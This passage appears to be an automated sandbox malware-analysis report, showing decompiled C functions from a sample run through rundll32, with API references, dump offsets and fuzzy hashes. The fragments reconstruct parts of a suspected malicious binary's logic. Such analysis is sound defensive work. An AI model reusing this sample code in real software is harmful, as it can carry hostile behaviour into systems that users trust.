                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                      • String ID:
                                      • API String ID: 58946197-0
                                      • Opcode ID: 3a0318b1df8816ba7e6940ce00bae658326eee79d9ee1e7874f9bab1fe7c4dcb
                                      • Instruction ID: 63e5378edcdff5b6c3e0f778e9ded108c901026136da215b4e791d5e759a971f
                                      • Opcode Fuzzy Hash: 3a0318b1df8816ba7e6940ce00bae658326eee79d9ee1e7874f9bab1fe7c4dcb
                                      • Instruction Fuzzy Hash: 2EF05E703012429BEB20BFA7DD68F263BE4EB21740B454040F641DA351C224EC50DB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE67E2(void* __edx) {
                                      				void* _v8;
                                      				int _v12;
                                      				WCHAR* _v16;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* _t23;
                                      				intOrPtr _t24;
                                      				void* _t26;
                                      				intOrPtr _t32;
                                      				intOrPtr _t35;
                                      				void* _t37;
                                      				intOrPtr _t38;
                                      				void* _t40;
                                      				intOrPtr _t42;
                                      				void* _t45;
                                      				void* _t50;
                                      				void* _t52;
                                      
                                      				_t50 = __edx;
                                      				_v12 = 0;
                                      				_t23 = E04DE6955(0,  &_v8); // executed
                                      				if(_t23 != 0) {
                                      					_v8 = 0;
                                      				}
                                      				_t24 =  *0x4dea348; // 0x6bd5a8
                                      				_t4 = _t24 + 0x4debe30; // 0x54a93d8
                                      				_t5 = _t24 + 0x4debdd8; // 0x4f0053
                                      				_t26 = E04DE427E( &_v16, _v8, _t5, _t4); // executed
                                      				_t45 = _t26;
                                      				if(_t45 == 0) {
                                      					StrToIntExW(_v16, 0,  &_v12);
                                      					_t45 = 8;
                                      					if(_v12 < _t45) {
                                      						_t45 = 1;
                                      						__eflags = 1;
                                      					} else {
                                      						_t32 =  *0x4dea348; // 0x6bd5a8
                                      						_t11 = _t32 + 0x4debe24; // 0x54a93cc
                                      						_t48 = _t11;
                                      						_t12 = _t32 + 0x4debdd8; // 0x4f0053
                                      						_t52 = E04DE6203(_t11, _t12, _t11);
                                      						_t59 = _t52;
                                      						if(_t52 != 0) {
                                      							_t35 =  *0x4dea348; // 0x6bd5a8
                                      							_t13 = _t35 + 0x4debe6e; // 0x30314549
                                      							_t37 = E04DE13F8(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                      							if(_t37 == 0) {
                                      								_t61 =  *0x4dea2fc - 6;
                                      								if( *0x4dea2fc <= 6) {
                                      									_t42 =  *0x4dea348; // 0x6bd5a8
                                      									_t15 = _t42 + 0x4debdba; // 0x52384549
                                      									E04DE13F8(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                      								}
                                      							}
                                      							_t38 =  *0x4dea348; // 0x6bd5a8
                                      							_t17 = _t38 + 0x4debe68; // 0x54a9410
                                      							_t18 = _t38 + 0x4debe40; // 0x680043
                                      							_t40 = E04DE3B76(_v8, 0x80000001, _t52, _t18, _t17); // executed
                                      							_t45 = _t40;
                                      							HeapFree( *0x4dea2d8, 0, _t52);
                                      						}
                                      					}
                                      					HeapFree( *0x4dea2d8, 0, _v16);
                                      				}
                                      				_t54 = _v8;
                                      				if(_v8 != 0) {
                                      					E04DE5147(_t54);
                                      				}
                                      				return _t45;
                                      			}

                                      APIs
                                      • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,054A93D8,00000000,?,7705F710,00000000,7705F730), ref: 04DE6831
                                      • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,054A9410,?,00000000,30314549,00000014,004F0053,054A93CC), ref: 04DE68CE
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04DE6BB4), ref: 04DE68E0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: eb698f4ce875718c44fef1dd16c5094f6fa85f9b36313e1bd988726078e1a494
                                      • Instruction ID: 2d1bbb0c3f6a1f5aaf67826a47153b684110995b5cfbace8524d01a7330b2bb8
                                      • Opcode Fuzzy Hash: eb698f4ce875718c44fef1dd16c5094f6fa85f9b36313e1bd988726078e1a494
                                      • Instruction Fuzzy Hash: D2319031A0021ABFDB11FB97DC94EAE3BBCEB48704F444156A600AB261D771FE459B60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 47%
                                      			E04DE4117(char* _a4, char** _a8) {
                                      				char* _t7;
                                      				char* _t11;
                                      				char* _t14;
                                      				char* _t16;
                                      				char* _t17;
                                      				char _t18;
                                      				signed int _t20;
                                      				signed int _t22;
                                      
                                      				_t16 = _a4;
                                      				_push(0x20);
                                      				_t20 = 1;
                                      				_push(_t16);
                                      				while(1) {
                                      					_t7 = StrChrA();
                                      					if(_t7 == 0) {
                                      						break;
                                      					}
                                      					_t20 = _t20 + 1;
                                      					_push(0x20);
                                      					_push( &(_t7[1]));
                                      				}
                                      				_t11 = E04DE4DF6(_t20 << 2);
                                      				_a4 = _t11;
                                      				if(_t11 != 0) {
                                      					StrTrimA(_t16, 0x4de9284); // executed
                                      					_t22 = 0;
                                      					do {
                                      						_t14 = StrChrA(_t16, 0x20);
                                      						if(_t14 != 0) {
                                      							 *_t14 = 0;
                                      							do {
                                      								_t14 =  &(_t14[1]);
                                      								_t18 =  *_t14;
                                      							} while (_t18 == 0x20 || _t18 == 9);
                                      						}
                                      						_t17 = _a4;
                                      						 *(_t17 + _t22 * 4) = _t16;
                                      						_t22 = _t22 + 1;
                                      						_t16 = _t14;
                                      					} while (_t14 != 0);
                                      					 *_a8 = _t17;
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                      • StrChrA.SHLWAPI(?,00000020,00000000,054A95AC,?,?,04DE6940,?,054A95AC), ref: 04DE4133
                                      • StrTrimA.SHLWAPI(?,04DE9284,00000002,?,04DE6940,?,054A95AC), ref: 04DE4151
                                      • StrChrA.SHLWAPI(?,00000020,?,04DE6940,?,054A95AC), ref: 04DE415C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Trim
                                      • String ID:
                                      • API String ID: 3043112668-0
                                      • Opcode ID: 566a2bd2ecd160aaca18f227019b9ec6218cc2d7c77e202bee66efd0acdf6b2d
                                      • Instruction ID: 730dcc8b8c0fb6051343a4d77dd7aa99c8370f666d19b6f597b514acbf0e84a4
                                      • Opcode Fuzzy Hash: 566a2bd2ecd160aaca18f227019b9ec6218cc2d7c77e202bee66efd0acdf6b2d
                                      • Instruction Fuzzy Hash: AF01D4713003666FEB206E2B9C54F777BDDFBE9750F450011B955CB242D671E802C660
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 64%
                                      			E04DE3E6C(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                      				intOrPtr _v36;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				void _v60;
                                      				char _v64;
                                      				long _t14;
                                      				intOrPtr _t18;
                                      				intOrPtr _t19;
                                      				intOrPtr _t26;
                                      				intOrPtr _t27;
                                      				long _t28;
                                      
                                      				_t27 = __edi;
                                      				_t26 = _a8;
                                      				_t14 = E04DE3C00(_a4, _t26, __edi); // executed
                                      				_t28 = _t14;
                                      				if(_t28 != 0) {
                                      					memset( &_v60, 0, 0x38);
                                      					_t18 =  *0x4dea348; // 0x6bd5a8
                                      					_t28 = 0;
                                      					_v64 = 0x3c;
                                      					if(_a12 == 0) {
                                      						_t7 = _t18 + 0x4deb4e8; // 0x70006f
                                      						_t19 = _t7;
                                      					} else {
                                      						_t6 = _t18 + 0x4deb8ec; // 0x750072
                                      						_t19 = _t6;
                                      					}
                                      					_v52 = _t19;
                                      					_push(_t28);
                                      					_v48 = _a4;
                                      					_v44 = _t26;
                                      					_v36 = _t27;
                                      					E04DE37E9();
                                      					_push( &_v64);
                                      					if( *0x4dea100() == 0) {
                                      						_t28 = GetLastError();
                                      					}
                                      					_push(1);
                                      					E04DE37E9();
                                      				}
                                      				return _t28;
                                      			}

                                      APIs
                                        • Part of subcall function 04DE3C00: SysAllocString.OLEAUT32(00000000), ref: 04DE3C5A
                                        • Part of subcall function 04DE3C00: SysAllocString.OLEAUT32(0070006F), ref: 04DE3C6E
                                        • Part of subcall function 04DE3C00: SysAllocString.OLEAUT32(00000000), ref: 04DE3C80
                                      • memset.NTDLL ref: 04DE3E8F
                                      • GetLastError.KERNEL32 ref: 04DE3EDB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocString$ErrorLastmemset
                                      • String ID: <
                                      • API String ID: 3736384471-4251816714
                                      • Opcode ID: 9379dac8a6647fcca6c80159aff59de8bc15ff4c7eb21682d18d3bdb053da8ee
                                      • Instruction ID: 7b5aa20c72c3bfdc4d35fe7dfa53f22b5023b7ea91d5718fd93eec2035697d00
                                      • Opcode Fuzzy Hash: 9379dac8a6647fcca6c80159aff59de8bc15ff4c7eb21682d18d3bdb053da8ee
                                      • Instruction Fuzzy Hash: F801E171A00218ABDB11FF97D884EEE7BB8FB08754F414516ED04AB240D775E9458BA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE55D3(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                      				int _v12;
                                      				signed int _v16;
                                      				void* _v20;
                                      				signed char _v36;
                                      				void* _t24;
                                      				intOrPtr _t27;
                                      				void* _t35;
                                      				signed int _t38;
                                      				signed char* _t46;
                                      				int _t53;
                                      				void* _t55;
                                      				void* _t56;
                                      				void* _t57;
                                      
                                      				_v16 = _v16 & 0x00000000;
                                      				_t46 = _a4;
                                      				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                                      				_v12 = 0x110;
                                      				_t24 = E04DE4DF6(_t53);
                                      				_a4 = _t24;
                                      				if(_t24 != 0) {
                                      					memcpy(_t24,  *0x4dea378, 0x110);
                                      					_t27 =  *0x4dea37c; // 0x0
                                      					_t57 = _t56 + 0xc;
                                      					if(_t27 != 0) {
                                      						_t51 = _a4;
                                      						E04DE29B5(0x110, _a4, _a4, _t27, 0);
                                      					}
                                      					if(E04DE66A9( &_v36) != 0) {
                                      						_t35 = E04DE3072(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                                      						if(_t35 == 0) {
                                      							_t55 = _v20;
                                      							_v36 =  *_t46;
                                      							_t38 = E04DE17E5(_t55, _a8, _t51, _t46, _a12); // executed
                                      							_v16 = _t38;
                                      							 *(_t55 + 4) = _v36;
                                      							_t20 =  &(_t46[4]); // 0xbf0845c7
                                      							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
                                      							_t57 = _t57 + 0xc;
                                      							E04DE4C73(_t55);
                                      						}
                                      					}
                                      					memset(_a4, 0, _t53);
                                      					E04DE4C73(_a4);
                                      				}
                                      				return _v16;
                                      			}

                                      APIs
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • memcpy.NTDLL(00000000,00000110,?,?,?,?,04DE6D90,?,04DE58B7,04DE58B7,?), ref: 04DE5609
                                      • memset.NTDLL ref: 04DE567F
                                      • memset.NTDLL ref: 04DE5693
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memset$AllocateHeapmemcpy
                                      • String ID:
                                      • API String ID: 1529149438-0
                                      • Opcode ID: deba25fcfc895ee22f2f645c131f8da4066a07df42828f941167641fc3aef2e2
                                      • Instruction ID: e7cb1c508b02f78e48097b151841801171e940d58cfe830bc8e2084fbbab5439
                                      • Opcode Fuzzy Hash: deba25fcfc895ee22f2f645c131f8da4066a07df42828f941167641fc3aef2e2
                                      • Instruction Fuzzy Hash: 91215C71A00618BBEF01BFA6DC50FBE7BB8EF09644F004055F904AA250E734EA058BB4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 92%
                                      			E04DE215A(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                                      				signed int _v5;
                                      				signed int _v12;
                                      				void* _t32;
                                      				signed int _t37;
                                      				signed int _t39;
                                      				signed char _t45;
                                      				void* _t49;
                                      				char* _t51;
                                      				signed int _t65;
                                      				signed int _t66;
                                      				signed int _t69;
                                      
                                      				_v12 = _v12 & 0x00000000;
                                      				_t69 = __eax;
                                      				_t32 = RtlAllocateHeap( *0x4dea2d8, 0, __eax << 2); // executed
                                      				_t49 = _t32;
                                      				if(_t49 == 0) {
                                      					_v12 = 8;
                                      				} else {
                                      					 *_a8 = _t49;
                                      					do {
                                      						_t45 =  *_a4;
                                      						asm("cdq");
                                      						_t65 = 0x64;
                                      						_t37 = (_t45 & 0x000000ff) / _t65;
                                      						_v5 = _t37;
                                      						if(_t37 != 0) {
                                      							 *_t49 = _t37 + 0x30;
                                      							_t49 = _t49 + 1;
                                      							_t45 = _t45 + _t37 * 0x9c;
                                      						}
                                      						asm("cdq");
                                      						_t66 = 0xa;
                                      						_t39 = (_t45 & 0x000000ff) / _t66;
                                      						if(_t39 != 0 || _v5 != _t39) {
                                      							 *_t49 = _t39 + 0x30;
                                      							_t49 = _t49 + 1;
                                      							_t45 = _t45 + _t39 * 0xf6;
                                      						}
                                      						_a4 = _a4 + 1;
                                      						 *_t49 = _t45 + 0x30;
                                      						 *(_t49 + 1) = 0x2c;
                                      						_t49 = _t49 + 2;
                                      						_t69 = _t69 - 1;
                                      					} while (_t69 != 0);
                                      					_t51 = _t49 - 1;
                                      					 *_a12 = _t51 -  *_a8;
                                      					 *_t51 = 0;
                                      				}
                                      				return _v12;
                                      			}

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04DE2172
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: FNwPq
                                      • API String ID: 1279760036-3591455833
                                      • Opcode ID: 82e2cdba160c948c02cdd95c55ca81813c4f353f45c89083e86a3c6850ef44ca
                                      • Instruction ID: 4c51392722a850162e696663f088b01c634bb62578c27c96d84bb65c38dfbdff
                                      • Opcode Fuzzy Hash: 82e2cdba160c948c02cdd95c55ca81813c4f353f45c89083e86a3c6850ef44ca
                                      • Instruction Fuzzy Hash: 74110631245345AFEB0A9F2ADC91BE97BA9EF53318F1440CAE5409F392C277960BC720
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE4DF6(long _a4) {
                                      				void* _t2;
                                      
                                      				_t2 = RtlAllocateHeap( *0x4dea2d8, 0, _a4); // executed
                                      				return _t2;
                                      			}


                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: FNwPq
                                      • API String ID: 1279760036-3591455833
                                      • Opcode ID: 8661854568f906e7ccc343e7f3c2149f78ea85eae9310fcbdcda3acf524b13ce
                                      • Instruction ID: 34270fee2a5bcb831006bb92e7955060a2c6f14052587d1d2f6e9c847f2e487f
                                      • Opcode Fuzzy Hash: 8661854568f906e7ccc343e7f3c2149f78ea85eae9310fcbdcda3acf524b13ce
                                      • Instruction Fuzzy Hash: 20B01271201200ABCA01AB01DD28F457B21F790700F004410B2045827182770C60FB04
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 38%
                                      			E04DE1162(intOrPtr _a4) {
                                      				void* _v12;
                                      				char _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				void* _v28;
                                      				char _v32;
                                      				intOrPtr _v40;
                                      				void* _v46;
                                      				short _v48;
                                      				intOrPtr _t49;
                                      				void* _t51;
                                      				intOrPtr* _t53;
                                      				intOrPtr _t56;
                                      				void* _t58;
                                      				intOrPtr* _t59;
                                      				intOrPtr* _t61;
                                      				intOrPtr* _t63;
                                      				intOrPtr* _t65;
                                      				intOrPtr* _t67;
                                      				intOrPtr* _t69;
                                      				intOrPtr* _t71;
                                      				short _t73;
                                      				intOrPtr* _t74;
                                      				intOrPtr _t77;
                                      				intOrPtr* _t80;
                                      				intOrPtr _t82;
                                      				char* _t98;
                                      				intOrPtr _t100;
                                      				void* _t106;
                                      				void* _t108;
                                      				intOrPtr _t112;
                                      
                                      				_v48 = 0;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosw");
                                      				_t49 =  *0x4dea348; // 0x6bd5a8
                                      				_t4 = _t49 + 0x4deb450; // 0x54a89f8
                                      				_t82 = 0;
                                      				_t5 = _t49 + 0x4deb440; // 0x9ba05972
                                      				_t51 =  *0x4dea170(_t5, 0, 4, _t4,  &_v20); // executed
                                      				_t106 = _t51;
                                      				if(_t106 >= 0) {
                                      					_t53 = _v20;
                                      					_push( &_v12);
                                      					_push(1);
                                      					_push( &_v32);
                                      					_push(8);
                                      					_t98 =  &_v48;
                                      					_push(_t98);
                                      					_push(_t98);
                                      					_push(_t53); // executed
                                      					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                                      						_t56 =  *0x4dea348; // 0x6bd5a8
                                      						_t30 = _t56 + 0x4deb430; // 0x54a89d8
                                      						_t31 = _t56 + 0x4deb460; // 0x4c96be40
                                      						_t58 =  *0x4dea10c(_v12, _t31, _t30,  &_v24); // executed
                                      						_t106 = _t58;
                                      						_t59 = _v12;
                                      						 *((intOrPtr*)( *_t59 + 8))(_t59);
                                      						goto L11;
                                      					} else {
                                      						_t71 = _v20;
                                      						_v16 = 0;
                                      						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                                      						if(_t106 >= 0) {
                                      							_t112 = _v16;
                                      							if(_t112 == 0) {
                                      								_t106 = 0x80004005;
                                      								goto L11;
                                      							} else {
                                      								if(_t112 <= 0) {
                                      									L11:
                                      									if(_t106 >= 0) {
                                      										goto L12;
                                      									}
                                      								} else {
                                      									do {
                                      										_t73 = 3;
                                      										_v48 = _t73;
                                      										_t74 = _v20;
                                      										_v40 = _t82;
                                      										_t108 = _t108 - 0x10;
                                      										asm("movsd");
                                      										asm("movsd");
                                      										asm("movsd");
                                      										asm("movsd");
                                      										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
                                      										if(_t106 < 0) {
                                      											goto L7;
                                      										} else {
                                      											_t77 =  *0x4dea348; // 0x6bd5a8
                                      											_t23 = _t77 + 0x4deb430; // 0x54a89d8
                                      											_t24 = _t77 + 0x4deb460; // 0x4c96be40
                                      											_t106 =  *0x4dea10c(_v12, _t24, _t23,  &_v24);
                                      											_t80 = _v12;
                                      											 *((intOrPtr*)( *_t80 + 8))(_t80);
                                      											if(_t106 >= 0) {
                                      												L12:
                                      												_t63 = _v24;
                                      												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                                      												if(_t106 >= 0) {
                                      													_t100 =  *0x4dea348; // 0x6bd5a8
                                      													_t67 = _v28;
                                      													_t40 = _t100 + 0x4deb420; // 0x214e3
                                      													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                                      													_t69 = _v28;
                                      													 *((intOrPtr*)( *_t69 + 8))(_t69);
                                      												}
                                      												_t65 = _v24;
                                      												 *((intOrPtr*)( *_t65 + 8))(_t65);
                                      											} else {
                                      												goto L7;
                                      											}
                                      										}
                                      										goto L15;
                                      										L7:
                                      										_t82 = _t82 + 1;
                                      									} while (_t82 < _v16);
                                      									goto L11;
                                      								}
                                      							}
                                      						}
                                      					}
                                      					L15:
                                      					_t61 = _v20;
                                      					 *((intOrPtr*)( *_t61 + 8))(_t61);
                                      				}
                                      				return _t106;
                                      			}


                                      APIs
                                      • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,054A89D8,04DE3C2E,?,?,?,?,?,?,?,?,?,?,?,04DE3C2E), ref: 04DE122F
                                      • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,054A89D8,04DE3C2E,?,?,?,?,?,?,?,04DE3C2E,00000000,00000000,00000000,006D0063), ref: 04DE126D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: QueryServiceUnknown_
                                      • String ID:
                                      • API String ID: 2042360610-0
                                      • Opcode ID: d3f64cf32e55ccabd3a4e56a539760fa962bd8f4847cd5ef35a4274229c0e073
                                      • Instruction ID: adcfd7960618feb07b944d92b524e74b48fb8e6c58fed43f32f6303e26e3a231
                                      • Opcode Fuzzy Hash: d3f64cf32e55ccabd3a4e56a539760fa962bd8f4847cd5ef35a4274229c0e073
                                      • Instruction Fuzzy Hash: FE512175A0021AAFCB01EFE5C885DAEB7B9FF88704B048559E905EB311D631AD45CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E04DE69D2(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                      				void* _v8;
                                      				void* __esi;
                                      				intOrPtr* _t35;
                                      				void* _t40;
                                      				intOrPtr* _t41;
                                      				intOrPtr* _t43;
                                      				intOrPtr* _t45;
                                      				intOrPtr* _t50;
                                      				intOrPtr* _t52;
                                      				void* _t54;
                                      				intOrPtr* _t55;
                                      				intOrPtr* _t57;
                                      				intOrPtr* _t61;
                                      				intOrPtr* _t65;
                                      				intOrPtr _t68;
                                      				void* _t72;
                                      				void* _t75;
                                      				void* _t76;
                                      
                                      				_t55 = _a4;
                                      				_t35 =  *((intOrPtr*)(_t55 + 4));
                                      				_a4 = 0;
                                      				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                      				if(_t76 < 0) {
                                      					L18:
                                      					return _t76;
                                      				}
                                      				_t40 = E04DE1000(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                      				_t76 = _t40;
                                      				if(_t76 >= 0) {
                                      					_t61 = _a28;
                                      					if(_t61 != 0 &&  *_t61 != 0) {
                                      						_t52 = _v8;
                                      						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                      					}
                                      					if(_t76 >= 0) {
                                      						_t43 =  *_t55;
                                      						_t68 =  *0x4dea348; // 0x6bd5a8
                                      						_t20 = _t68 + 0x4deb1fc; // 0x740053
                                      						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                      						if(_t76 >= 0) {
                                      							_t76 = E04DE2898(_a4);
                                      							if(_t76 >= 0) {
                                      								_t65 = _a28;
                                      								if(_t65 != 0 &&  *_t65 == 0) {
                                      									_t50 = _a4;
                                      									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                      								}
                                      							}
                                      						}
                                      						_t45 = _a4;
                                      						if(_t45 != 0) {
                                      							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                      						}
                                      						_t57 = __imp__#6;
                                      						if(_a20 != 0) {
                                      							 *_t57(_a20);
                                      						}
                                      						if(_a12 != 0) {
                                      							 *_t57(_a12);
                                      						}
                                      					}
                                      				}
                                      				_t41 = _v8;
                                      				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                      				goto L18;
                                      			}


                                      APIs
                                        • Part of subcall function 04DE1000: SysAllocString.OLEAUT32(80000002), ref: 04DE105D
                                        • Part of subcall function 04DE1000: SysFreeString.OLEAUT32(00000000), ref: 04DE10C3
                                      • SysFreeString.OLEAUT32(?), ref: 04DE6AB1
                                      • SysFreeString.OLEAUT32(04DE6ECE), ref: 04DE6ABB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$Free$Alloc
                                      • String ID:
                                      • API String ID: 986138563-0
                                      • Opcode ID: f57f37be8aa06f4382f171267360b1545c65ccf364b5dc9e9194cbc8d65af917
                                      • Instruction ID: 60581999fa94e1134744a6017bdac06e77c0db834a739cb899d38fc863336c39
                                      • Opcode Fuzzy Hash: f57f37be8aa06f4382f171267360b1545c65ccf364b5dc9e9194cbc8d65af917
                                      • Instruction Fuzzy Hash: A5315C71A00119AFCB11EF56C888CAFBBB9FFD97407648658F8159B214E331ED61DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 50%
                                      			E04DE6615(intOrPtr* __eax, intOrPtr _a4) {
